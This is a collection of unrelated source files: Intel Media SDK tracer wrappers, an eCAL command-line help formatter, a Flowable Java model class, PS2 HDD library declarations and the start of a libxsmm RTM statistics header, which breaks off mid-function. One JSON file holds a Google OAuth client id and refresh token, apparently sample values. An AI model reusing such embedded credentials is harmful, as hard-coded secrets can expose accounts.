mfxVideoCodecPlugin::EncodeFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_DecodeHeader(mfxHDL _pthis, mfxBitstream *bs, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_DecodeHeader_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeHeader(mfxHDL pthis=" + ToString(pthis) + ", mfxBitstream *bs=" + ToString(bs) + ", mfxVideoParam *par=" + ToString(par) + ") +"); fmfxVideoCodecPlugin_DecodeHeader proc = (fmfxVideoCodecPlugin_DecodeHeader)pCtx->callbacks[emfxVideoCodecPlugin_DecodeHeader_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (bs) Log::WriteLog(context.dump("bs", *bs)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, bs, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::DecodeHeader called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeHeader(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_GetPayload(mfxHDL _pthis, mfxU64 *ts, mfxPayload *payload) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_GetPayload_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::GetPayload(mfxHDL pthis=" + ToString(pthis) + ", mfxU64 *ts=" + ToString(ts) + ", mfxPayload *payload=" + ToString(payload) + ") +"); fmfxVideoCodecPlugin_GetPayload proc = (fmfxVideoCodecPlugin_GetPayload)pCtx->callbacks[emfxVideoCodecPlugin_GetPayload_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (ts) Log::WriteLog("ts" + ToString(*ts)); if (payload) Log::WriteLog(context.dump("payload", *payload)); Timer t; mfxStatus status = (*proc) (pthis, ts, payload); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::GetPayload called"); if (ts) Log::WriteLog("ts" + ToString(*ts)); if (payload) Log::WriteLog(context.dump("par", *payload)); Log::WriteLog("callback: mfxVideoCodecPlugin::GetPayload(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_DecodeFrameSubmit(mfxHDL _pthis, mfxBitstream *bs, mfxFrameSurface1 *surface_work, mfxFrameSurface1 **surface_out, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_DecodeFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxBitstream *bs=" + ToString(bs) + ", mfxFrameSurface1 *surface_work=" + ToString(surface_work) + ", mfxFrameSurface1 **surface_out=" + ToString(surface_out) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_DecodeFrameSubmit proc = (fmfxVideoCodecPlugin_DecodeFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_DecodeFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (bs) Log::WriteLog(context.dump("bs", *bs)); if (surface_work) Log::WriteLog(context.dump("surface_work", *surface_work)); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); Timer t; mfxStatus status = (*proc) (pthis, bs, surface_work, surface_out, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::DecodeFrameSubmit called"); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_VPPFrameSubmit(mfxHDL _pthis, mfxFrameSurface1 *in, mfxFrameSurface1 *out, mfxExtVppAuxData *aux, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_VPP; Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *in=" + ToString(in) + ", mfxFrameSurface1 *out=" + ToString(out) + ", mfxExtVppAuxData *aux=" + ToString(aux) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_VPPFrameSubmit proc = (fmfxVideoCodecPlugin_VPPFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Timer t; mfxStatus status = (*proc) (pthis, in, out, aux, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::VPPFrameSubmit called"); if (out) Log::WriteLog(context.dump("out", *out)); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_VPPFrameSubmitEx(mfxHDL _pthis, mfxFrameSurface1 *in, mfxFrameSurface1 *surface_work, mfxFrameSurface1 **surface_out, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmitEx_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmitEx(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *in=" + ToString(in) + ", mfxFrameSurface1 *surface_work=" + ToString(surface_work) + ", mfxFrameSurface1 **surface_out=" + ToString(surface_out) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_VPPFrameSubmitEx proc = (fmfxVideoCodecPlugin_VPPFrameSubmitEx)pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmitEx_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (in) Log::WriteLog(context.dump("in", *in)); if (surface_work) Log::WriteLog(context.dump("surface_work", *surface_work)); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); Timer t; mfxStatus status = (*proc) (pthis, in, surface_work, surface_out, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::VPPFrameSubmitEx called"); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmitEx(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_ENCFrameSubmit(mfxHDL _pthis, mfxENCInput *in, mfxENCOutput *out, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_ENCFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::ENCFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxENCInput *in=" + ToString(in) + ", mfxENCOutput *out=" + ToString(out) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_ENCFrameSubmit proc = (fmfxVideoCodecPlugin_ENCFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_ENCFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis, in, out, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::ENCFrameSubmit called"); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::ENCFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } #endif //TRACE_CALLBACKS mfxStatus MFXVideoUSER_Register(mfxSession session, mfxU32 type, const mfxPlugin *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; Log::WriteLog("function: MFXVideoUSER_Register(mfxSession session=" + ToString(session) + ", mfxU32 type=" + ToString(type) + ", mfxPlugin *par=" + ToString(par) + ") +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_Register_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); if (par) Log::WriteLog(context.dump("par", *par)); #if TRACE_CALLBACKS INIT_CALLBACK_BACKUP(loader->plugin[type].callbacks); mfxPlugin proxyPar; if (par && type < (sizeof(loader->plugin) / sizeof(loader->plugin[0]))) { proxyPar = *par; par = &proxyPar; if (loader->plugin[type].pLoaderBase != loader) loader->plugin[type].pLoaderBase = loader; SET_CALLBACK(mfxPlugin, proxyPar., PluginInit, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., PluginClose, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., GetPluginParam, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., Execute, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., FreeResources, proxyPar.pthis); if (type == MFX_PLUGINTYPE_VIDEO_GENERAL) { SET_CALLBACK(mfxPlugin, proxyPar., Submit, proxyPar.pthis); } else { SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Query, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, QueryIOSurf, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Init, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Reset, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Close, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, GetVideoParam, proxyPar.pthis); switch (type) { case MFX_PLUGINTYPE_VIDEO_DECODE: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, DecodeHeader, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, GetPayload, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, DecodeFrameSubmit, proxyPar.pthis); break; case MFX_PLUGINTYPE_VIDEO_ENCODE: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, EncodeFrameSubmit, proxyPar.pthis); break; case MFX_PLUGINTYPE_VIDEO_VPP: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, VPPFrameSubmit, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, VPPFrameSubmitEx, proxyPar.pthis); break; case MFX_PLUGINTYPE_VIDEO_ENC: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, ENCFrameSubmit, proxyPar.pthis); break; default: break; } } if (proxyPar.pthis) proxyPar.pthis = &loader->plugin[type]; } #endif //TRACE_CALLBACKS Timer t; mfxStatus status = (*(fMFXVideoUSER_Register) proc)(session, type, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> MFXVideoUSER_Register called"); //No need to dump input-only parameters twice!!! //Log::WriteLog(context.dump("session", session)); //Log::WriteLog(context.dump_mfxU32("type", type)); //if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("function: MFXVideoUSER_Register(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); #if TRACE_CALLBACKS if (status < MFX_ERR_NONE) callbacks.RevertAll(); #endif //TRACE_CALLBACKS return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXVideoUSER_Unregister(mfxSession session, mfxU32 type) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; Log::WriteLog("function: MFXVideoUSER_Unregister(mfxSession session=" + ToString(session) + ", mfxU32 type=" + ToString(type) + ", mfxPlugin *par=" + ") +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_Unregister_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); Timer t; mfxStatus status = (*(fMFXVideoUSER_Unregister) proc) (session, type); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> MFXVideoUSER_Unregister called"); Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); Log::WriteLog("function: MFXVideoUSER_Unregister(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXVideoUSER_ProcessFrameAsync(mfxSession session, const mfxHDL *in, mfxU32 in_num, const mfxHDL *out, mfxU32 out_num, mfxSyncPoint *syncp) { try { if (Log::GetLogLevel() >= LOG_LEVEL_FULL) // call with logging { DumpContext context; context.context = DUMPCONTEXT_MFX; TracerSyncPoint sp; if (syncp) { sp.syncPoint = (*syncp); } else { sp.syncPoint = NULL; } Log::WriteLog("function: MFXVideoUSER_ProcessFrameAsync(mfxSession session=, const mfxHDL *in, mfxU32 in_num, const mfxHDL *out, mfxU32 out_num, mfxSyncPoint *syncp) +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_ProcessFrameAsync_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxHDL("in", in)); Log::WriteLog(context.dump_mfxU32("in_num", in_num)); Log::WriteLog(context.dump_mfxHDL("out", out)); Log::WriteLog(context.dump_mfxU32("out_num", out_num)); Log::WriteLog(context.dump("syncp", sp.syncPoint)); Timer t; mfxStatus status = (*(fMFXVideoUSER_ProcessFrameAsync) proc) (session, in, in_num, out, out_num, syncp); std::string elapsed = TimeToString(t.GetTime()); if (syncp) { sp.syncPoint = (*syncp); } else { sp.syncPoint = NULL; } Log::WriteLog(">> MFXVideoUSER_ProcessFrameAsync called"); Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxHDL("in", in)); Log::WriteLog(context.dump_mfxU32("in_num", in_num)); Log::WriteLog(context.dump_mfxHDL("out", out)); Log::WriteLog(context.dump_mfxU32("out_num", out_num)); Log::WriteLog(context.dump("syncp", sp.syncPoint)); Log::WriteLog("function: MFXVideoUSER_ProcessFrameAsync(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } else // call without logging { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_ProcessFrameAsync_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; mfxStatus status = (*(fMFXVideoUSER_ProcessFrameAsync) proc) (session, in, in_num, out, out_num, syncp); return status; } } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXVideoUSER_GetPlugin(mfxSession session, mfxU32 type, mfxPlugin *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; Log::WriteLog("function: MFXVideoUSER_GetPlugin(mfxSession session=" + ToString(session) + ", mfxU32 type=" + ToString(type) + ", mfxPlugin *par=" + ToString(par) + ") +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_GetPlugin_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*(fMFXVideoUSER_GetPlugin) proc)(session, type, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> MFXVideoUSER_GetPlugin called"); Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("function: MFXVideoUSER_GetPlugin(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXAudioUSER_Register(mfxSession session, mfxU32 type, const mfxPlugin *par) { (void)session; (void)type; (void)par; return MFX_ERR_NONE; } mfxStatus MFXAudioUSER_Unregister(mfxSession session, mfxU32 type) { (void)session; (void)type; return MFX_ERR_NONE; }
28,452
493
/* ========================= eCAL LICENSE ================================= * * Copyright (C) 2016 - 2019 Continental Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * ========================= eCAL LICENSE ================================= */ #include <custom_tclap/advanced_tclap_output.h> #include <sstream> namespace CustomTclap { AdvancedTclapOutput::AdvancedTclapOutput(const std::vector<std::ostream*>& output_streams, int max_width) : output_streams_(output_streams) , max_width_(max_width) {} AdvancedTclapOutput::AdvancedTclapOutput(std::ostream* output_stream, int max_width) : AdvancedTclapOutput(std::vector<std::ostream*>{output_stream}, max_width) {} void AdvancedTclapOutput::version(TCLAP::CmdLineInterface &cmd) { std::string progName = cmd.getProgramName(); std::string xversion = cmd.getVersion(); std::stringstream ss; // Create string ss << std::endl << progName << " version: " << xversion << std::endl << std::endl; // publish string to all output streams for (std::ostream* output_stream : output_streams_) { (*output_stream) << ss.str(); } } void AdvancedTclapOutput::usage(TCLAP::CmdLineInterface &cmd) { std::stringstream ss; // Create string ss << std::endl << "USAGE: " << std::endl << std::endl; shortUsage(cmd, ss); ss << std::endl << std::endl << "Where: " << std::endl << std::endl; longUsage(cmd, ss); ss << std::endl; // publish string to all output streams for (std::ostream* output_stream : output_streams_) { (*output_stream) << ss.str(); } } void AdvancedTclapOutput::failure(TCLAP::CmdLineInterface &cmd, TCLAP::ArgException &e) { std::stringstream ss; // Create string std::string progName = cmd.getProgramName(); ss << "PARSE ERROR: " << e.argId() << std::endl << " " << e.error() << std::endl << std::endl; if (cmd.hasHelpAndVersion()) { ss << "Brief USAGE: " << std::endl; shortUsage(cmd, ss); ss << std::endl << "For complete USAGE and HELP type: " << std::endl << " " << progName << " --help" << std::endl << std::endl; } else { usage(cmd); } // publish string to all output streams for (std::ostream* output_stream : output_streams_) { (*output_stream) << ss.str(); } //throw TCLAP::ExitException(1); } void AdvancedTclapOutput::setArgumentHidden(TCLAP::Arg* argument, bool hidden) { if (hidden) hidden_arguments_.emplace(argument); else hidden_arguments_.erase(argument); } void AdvancedTclapOutput::shortUsage(TCLAP::CmdLineInterface& cmd, std::ostream& os) const { std::list<TCLAP::Arg*> arg_list = cmd.getArgList(); std::string prog_name = cmd.getProgramName(); TCLAP::XorHandler xor_handler = cmd.getXorHandler(); std::vector<std::vector<TCLAP::Arg*>> xor_list = xor_handler.getXorList(); std::string s = prog_name + " "; // first the xor xor_list = createXorListWithoutHiddenArgs(xor_list); for (int i = 0; static_cast<size_t>(i) < xor_list.size(); i++) { s += " {"; for (TCLAP::ArgVectorIterator it = xor_list[i].begin(); it != xor_list[i].end(); ++it) { s += (*it)->shortID() + "|"; } s[s.length() - 1] = '}'; } // then the rest for (TCLAP::ArgListIterator it = arg_list.begin(); it != arg_list.end(); ++it) { if (!xor_handler.contains((*it)) && (hidden_arguments_.find(*it) == hidden_arguments_.end())) { s += " " + (*it)->shortID(); } } // if the program name is too long, then adjust the second line offset int second_line_offset = static_cast<int>(prog_name.length()) + 2; if (second_line_offset > max_width_ / 3) { second_line_offset = static_cast<int>(max_width_ / 3); } spacePrint(os, s, max_width_, 3, second_line_offset); } void AdvancedTclapOutput::longUsage(TCLAP::CmdLineInterface& cmd, std::ostream& os) const { std::list<TCLAP::Arg*> arg_list = cmd.getArgList(); std::string message = cmd.getMessage(); TCLAP::XorHandler xor_handler = cmd.getXorHandler(); std::vector<std::vector<TCLAP::Arg*>> xor_list = xor_handler.getXorList(); xor_list = createXorListWithoutHiddenArgs(xor_list); // first the xor for (int i = 0; static_cast<unsigned int>(i) < xor_list.size(); i++) { for (TCLAP::ArgVectorIterator it = xor_list[i].begin(); it != xor_list[i].end(); ++it) { spacePrint(os, (*it)->longID(), max_width_, 3, 3); spacePrint(os, (*it)->getDescription(), max_width_, 5, 0); if (it + 1 != xor_list[i].end()) spacePrint(os, "-- OR --", max_width_, 9, 0); } os << std::endl << std::endl; } // then the rest for (TCLAP::ArgListIterator it = arg_list.begin(); it != arg_list.end(); ++it) { if (!xor_handler.contains((*it)) && (hidden_arguments_.find(*it) == hidden_arguments_.end())) { spacePrint(os, (*it)->longID(), max_width_, 3, 3); spacePrint(os, (*it)->getDescription(), max_width_, 5, 0); os << std::endl; } } os << std::endl; spacePrint(os, message, max_width_, 3, 0); } std::vector<std::vector<TCLAP::Arg*>> AdvancedTclapOutput::createXorListWithoutHiddenArgs(const std::vector<std::vector<TCLAP::Arg*>>& xor_list) const { std::vector<std::vector<TCLAP::Arg*>> cleaned_xor_list; // Remove hidden arguments from XOR list for (size_t i = 0; i < xor_list.size(); i++) { std::vector<TCLAP::Arg*> arg_list; for (size_t j = 0; j < xor_list[i].size(); j++) { if (hidden_arguments_.find(xor_list[i][j]) == hidden_arguments_.end()) { arg_list.push_back(xor_list[i][j]); } } if (!arg_list.empty()) { cleaned_xor_list.push_back(std::move(arg_list)); } } return cleaned_xor_list; } }
2,795
5,250
/* Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.flowable.bpmn.model; import java.util.ArrayList; import java.util.List; public class DataAssociation extends BaseElement { protected String sourceRef; protected String targetRef; protected String transformation; protected List<Assignment> assignments = new ArrayList<>(); public String getSourceRef() { return sourceRef; } public void setSourceRef(String sourceRef) { this.sourceRef = sourceRef; } public String getTargetRef() { return targetRef; } public void setTargetRef(String targetRef) { this.targetRef = targetRef; } public String getTransformation() { return transformation; } public void setTransformation(String transformation) { this.transformation = transformation; } public List<Assignment> getAssignments() { return assignments; } public void setAssignments(List<Assignment> assignments) { this.assignments = assignments; } @Override public DataAssociation clone() { DataAssociation clone = new DataAssociation(); clone.setValues(this); return clone; } public void setValues(DataAssociation otherAssociation) { setSourceRef(otherAssociation.getSourceRef()); setTargetRef(otherAssociation.getTargetRef()); setTransformation(otherAssociation.getTransformation()); assignments = new ArrayList<>(); if (otherAssociation.getAssignments() != null && !otherAssociation.getAssignments().isEmpty()) { for (Assignment assignment : otherAssociation.getAssignments()) { assignments.add(assignment.clone()); } } } }
767
3,212
{ "client_id": "123456789012-af23m23321knfg00ekrjlwke90rjkewl.apps.googleusercontent.com", "client_secret": "<KEY>", "refresh_token": "1/cvZBer532GBbzsxdf7jj7LOvd-IcmbSa5tgVcls5j5z", "type": "authorized_user" }
106
606
<reponame>AKuHAK/ps2sdk<gh_stars>100-1000 /* # _____ ___ ____ ___ ____ # ____| | ____| | | |____| # | ___| |____ ___| ____| | \ PS2DEV Open Source Project. #----------------------------------------------------------------------- # Copyright 2001-2004, ps2dev - http://www.ps2dev.org # Licenced under Academic Free License version 2.0 # Review ps2sdk README & LICENSE files for further details. */ /** * @file * HDD library functions */ #ifndef __LIBHDD_H__ #define __LIBHDD_H__ #include <tamtypes.h> #include <hdd-ioctl.h> #include <libpwroff.h> #define PFS_MT_ROBUST 0x02 #define FS_COMMON_PREFIX '+' #define FS_GROUP_SYSTEM 0x00 #define FS_GROUP_COMMON 0x01 #define FS_GROUP_APPLICATION 0x02 #define FS_TYPE_EXT2 0x0083 #define FS_TYPE_EXT2_SWAP 0x0082 #define FS_TYPE_PFS 0x0100 #define FS_TYPE_EMPTY 0x0000 #define ATTR_MAIN_PARTITION 0x0000 #define ATTR_SUB_PARTITION 0x0001 typedef struct { /** Filesystem name */ char name[32]; /** Filename which can be used with fXioMount */ char filename[40]; /** Total filesystem size, in mega-bytes */ u32 size; /** 1 if filesystem is formatted, 0 otherwise */ int formatted; /** Reported free space, in mega-bytes */ u32 freeSpace; /** Filesystem group (either system, common or application) */ int fileSystemGroup; } t_hddFilesystem; typedef struct { /** Total size of the HDD in mega-bytes */ u32 hddSize; /** Free space on the HDD in mega-bytes */ u32 hddFree; /** The maximum size allowed for a single partition, in mega-bytes */ u32 hddMaxPartitionSize; } t_hddInfo; #ifdef __cplusplus extern "C" { #endif int hddCheckPresent(); int hddCheckFormatted(); int hddFormat(); int hddGetFilesystemList(t_hddFilesystem hddFs[], int maxEntries); void hddGetInfo(t_hddInfo *info); int hddMakeFilesystem(int fsSizeMB, char *name, int type); int hddRemoveFilesystem(t_hddFilesystem *fs); int hddExpandFilesystem(t_hddFilesystem *fs, int extraMB); #ifdef __cplusplus } #endif // These hdd* functions are deprecated // Use the poweroff* version instead #define hddPreparePoweroff poweroffInit #define hddSetUserPoweroffCallback poweroffSetCallback #define hddPowerOff poweroffShutdown #endif /* __LIBHDD_H__ */
855
651
<reponame>abhisek-kundu/libxsmm /****************************************************************************** * Copyright (c) Intel Corporation - All rights reserved. * * This file is part of the LIBXSMM library. * * * * For information on the license, see the LICENSE file. * * Further information: https://github.com/hfp/libxsmm/ * * SPDX-License-Identifier: BSD-3-Clause * ******************************************************************************/ /* <NAME> (Intel Corp.) ******************************************************************************/ #include <immintrin.h> #include <iostream> #include <stdio.h> #ifdef RTM_DEBUG extern int rtm_stats[1000][16]; #endif #define ATTEMPTS 0 #define ABORTS 1 #define LOCKS 2 #define COUNTS 3 #define ABORTS_RETRY 4 #define ABORTS_NORETRY 5 #define ABORTS_TIMEOUT 6 #define ABORTS_EXPLICIT 7 #define ABORTS_ZERO 8 inline void clear_rtm_stats() { #ifdef RTM_DEBUG int rtm_max_threads = omp_get_max_threads(); for (int i = 0; i < rtm_max_threads; i++) { for (int j = 0; j < 16; j++) { rtm_stats[i][j] = 0; } } #endif } inline void print_rtm_stats() { #ifdef RTM_DEBUG int rtm_max_threads = omp_get_max_threads(); int total[16] = {0}; for (int i = 0; i < rtm_max_threads; i++) { printf("Tid %3d: RTM_STATS C: %8d AT: %8d AB: %8d L: %6d (E: %6d Z: %6d R: %6d O: %6d T: %6d)\n", i, rtm_stats[i][COUNTS], rtm_stats[i][ATTEMPTS], rtm_stats[i][ABORTS], rtm_stats[i][LOCKS], rtm_stats[i][ABORTS_EXPLICIT], rtm_stats[i][ABORTS_ZERO], rtm_stats[i][ABORTS_RETRY], rtm_stats[i][ABORTS_NORETRY], rtm_stats[i][ABORTS_TIMEOUT]); 